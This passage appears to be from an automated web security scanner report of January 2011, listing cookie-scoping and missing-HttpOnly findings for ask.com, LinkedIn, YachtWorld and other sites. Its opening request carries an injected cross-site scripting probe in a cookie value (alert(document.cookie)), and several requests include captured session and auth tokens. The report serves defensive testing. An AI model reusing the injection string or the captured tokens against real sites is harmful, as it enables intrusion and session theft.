Cookie: tbe=1; accepting=1; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; cu.wz=0; user="o=0&l=dir2a2ff'; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjMwOjA5LVVUQw%3D%3D&po=0&pp=dir2a2ff%27%3Balert%28document.cookie%29%2F%2F060dbcc8357; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5488|0~5489|0~5490|0~5396|1; wz_sid=014DDB4118C033B329ACD8C41BD460F3

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:30:51 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:30:51 GMT; Path=/
Set-Cookie: user=o=0; Domain=.ask.com; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjMwOjUxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:30:51 GMT; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:30:51 GMT; Path=/
Content-Length: 58816

...[SNIP]...

8.19. http://www.ask.com/pictures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictures

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjQ1OjM0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:34 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:45:34 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pictures?qsrc=167&o=0&l=dir&q=regulator+boat&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

8.20. http://www.ask.com/pictureslanding previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictureslanding

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pictureslanding HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Content-Length: 66176

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...

8.21. http://www.ask.com/questionoftheday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/questionoftheday

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjQwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:40 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:40 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /questionoftheday HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:13:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:40 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjQwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:40 GMT; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:40 GMT; Path=/
Content-Length: 50124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...

8.22. http://www.ask.com/settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/settings

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:28 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:28 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

8.23. http://www.ask.com/skins previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/skins

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjIxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:21 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:21 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /skins HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:21 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjIxLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:21 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:21 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 102418

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>
<head>
<tit
...[SNIP]...

8.24. http://www.ask.com/videos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/videos

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjE4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:18 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:18 GMT; Path=/
ldpt=porg=5488|0~5489|1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:18 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /videos HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:13:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:18 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjE4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:18 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:18 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|1; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:18 GMT; Path=/
Content-Length: 38405

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...

8.25. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

gcc=RW50ZXJ0YWlubWVudC9PdGhlcg..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:44 GMT; Path=/
clc=RW50ZXJ0YWlubWVudC9PdGhlcg..; Domain=.ask.com; Expires=Sat, 26-Feb-2011 19:13:44 GMT; Path=/
ldst=sorg=-1|1296155624688; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/
qh=1-V2hpY2grQW1lcmljYW4rSWRvbCtoYXMrc29sZCt0aGUrbW9zdCthbGJ1bXMlM0Y.; Domain=.ask.com; Path=/
puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjQ0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/
ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:44 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

8.26. http://www.ask.com/webadvanced previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/webadvanced

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webadvanced HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:13:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:26 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjI2LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:26 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 33908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <title>
Ask.com - Advanced Search
</title>


<met
...[SNIP]...

8.27. https://www.linkedin.com/secure/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.linkedin.com
Path:	/secure/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_MC_QH_MFP=ffffffffaf19965645525d5f4f58455e445a4a42198c; bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; JSESSIONID="ajax:2350077440714366421"; leo_auth_token="GST:UJWUmX2WB6UBWvbQG9tU456hlj942-5NnJhAM36W6e3C5Y4NH21kQQ:1296155990:5ed64d4d5f57e19d1092d1eaf1f4a8bd26dd7b76"; visit=G; s_leo_auth_token="delete me"; lang="v=2&lang=en&c=";

Response

8.28. http://www.reel-time.com/forum/showthread.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.reel-time.com
Path:	/forum/showthread.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

bblastvisit=1296157791; expires=Fri, 27 Jan 2012 19:49:51 GMT; path=/; domain=.reel-time.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forum/showthread.php HTTP/1.1
Host: www.reel-time.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

8.29. http://wzus1.ask.com/i/i.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wzus1.ask.com
Path:	/i/i.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; path=/; expires=Sat, 26-Jan-2013 19:12:50 GMT; domain=.ask.com
wz_sid=014DDB4118C033B329ACD8C41BD460F3; path=/; expires=Thu, 27-Jan-2011 19:42:50 GMT; domain=.ask.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /i/i.gif?t=v&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259 HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/?o=0&l=dir
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:12:50 GMT
Set-Cookie: wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; path=/; expires=Sat, 26-Jan-2013 19:12:50 GMT; domain=.ask.com
Set-Cookie: wz_sid=014DDB4118C033B329ACD8C41BD460F3; path=/; expires=Thu, 27-Jan-2011 19:42:50 GMT; domain=.ask.com
Set-Cookie: wz_scnt=1; path=/; expires=Sat, 26-Jan-2013 19:12:50 GMT; domain=.ask.com
Location: http://wzus1.ask.com/i/i.gif?t=S&d=us&s=a&c=h&l=dir&o=0&sv=0a5c404a&p=homepage&ord=7097259&wz_uid=1&wz_sid=1&wz_aid=0&uid=0&sid=0&aid=0&askeraser=0&scnt=0&wz_tid=0&
Content-Length: 420
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://wzus1.ask.com/i/i.gif?t=S&d=us&s
...[SNIP]...

9. Cookie without HttpOnly flag set previous next
There are 70 instances of this issue:

http://www.boats.com/boat-transport/index.jsp
http://www.boats.com/boat-transport/index.jsp
http://www.boats.com/includes/script_declarations.jsp
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html
https://www.linkedin.com/secure/login
http://www.yachtworld.com/boat-loans/finance/help_boatsbank.jsp
http://www.yachtworld.com/boat-loans/finance/rates.jsp
http://www.yachtworld.com/boat-loans/finance/what_to_expect.jsp
http://www.yachtworld.com/boat-loans/index.jsp
http://www.yachtworld.com/boat-loans/partner_program.jsp
https://www.yachtworld.com/boat-loans/consumer_loan_processing.html
https://www.yachtworld.com/boat-loans/forgot_password.jsp
https://www.yachtworld.com/boat-loans/index.jsp
https://www.yachtworld.com/boat-loans/myLoan.jsp
http://ads.pointroll.com/PortalServe/
http://govguru.com/north-carolina/boat-registration
http://hire.jobvite.com/CompanyJobs/Careers.aspx
http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s44969984570052
http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s48372025459539
http://metrics.yachtworld.com/b/ss/deyachtworld/1/H.17/s59107670621015
http://www.ask.com/
http://www.ask.com/
http://www.ask.com/about
http://www.ask.com/about/legal/privacy
http://www.ask.com/about/legal/terms
http://www.ask.com/advertise
http://www.ask.com/ans
http://www.ask.com/answers
http://www.ask.com/answers/000/Notification
http://www.ask.com/homepage
http://www.ask.com/ja-ask-dialog
http://www.ask.com/pictures
http://www.ask.com/pictureslanding
http://www.ask.com/questionoftheday
http://www.ask.com/settings
http://www.ask.com/skins
http://www.ask.com/videos
http://www.ask.com/web
http://www.ask.com/webadvanced
http://www.boatxchange.com/openx/www/delivery/ajs.php
http://www.boatxchange.com/openx/www/delivery/lg.php
http://www.dynamicdrive.com/forums/showthread.php
http://www.reel-time.com/forum/showthread.php
http://www.yachtworld.com/
http://www.yachtworld.com/
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-2305173/Gloucester/VA/United-States
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-Center-Console-2305157/Wilmington/NC/United-States
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-W--2006-250hp-Evinrude-E-tec-2152119/Fajardo/Puerto-Rico
http://www.yachtworld.com/boats/2004/Regulator-32cc-2141315/Orange-Beach/AL/United-States
http://www.yachtworld.com/boats/2004/Regulator-32fs-Center-Console-Loaded!-2255088/Fort-Lauderdale/FL/United-States
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2237772/Parkton/MD/United-States
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-2270278/Placida/FL/United-States
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-Center-Console-1990703/Brick/NJ/United-States
http://www.yachtworld.com/boats/2006/32-Regulator-With-Trailer-**reduced**-2266476/Destin/FL/United-States
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-*low-Hours*-2291213/Norwalk/CT/United-States
http://www.yachtworld.com/boats/2006/Regulator-32-Forward-Seating-2262662/Somers-Point/NJ/United-States
http://www.yachtworld.com/boats/2006/Regulator-32fs-With-Trailer-2267348/Quincy/MA/United-States
http://www.yachtworld.com/boats/2007/Regulator-32-Cc-4-Stroke-250-Yamahas-2194614/Ocean-City/MD/United-States
http://www.yachtworld.com/boats/2007/Regulator-Center-Console-2030806/VA/United-States
http://www.yachtworld.com/boats/2008/Regulator-32-Classic-2250145/Babylon/NY/United-States
http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2203131/Port-Clinton/OH/United-States
http://www.yachtworld.com/boats/2008/Regulator-32-Fs-2272100/Hampton/VA/United-States
http://www.yachtworld.com/boats/2009/Regulator-32-Fs-2300541/Sardegna-centro-orientale/Italy
http://www.yachtworld.com/boats/2010/Regulator-32fs-Center-Console-2293873/Brick/NJ/United-States
http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp
https://www.yachtworld.com/
http://wzus1.ask.com/i/i.gif

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

9.1. http://www.boats.com/boat-transport/index.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.boats.com
Path:	/boat-transport/index.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
boats_session_info=ccn:US:session_uom:126:locale_currency_id:100; domain=.boats.com; path=/; expires=Fri, 27-Jan-2012 19:49:19 GMT
JSESSIONID=ccjBA_HEbqX_; path=/
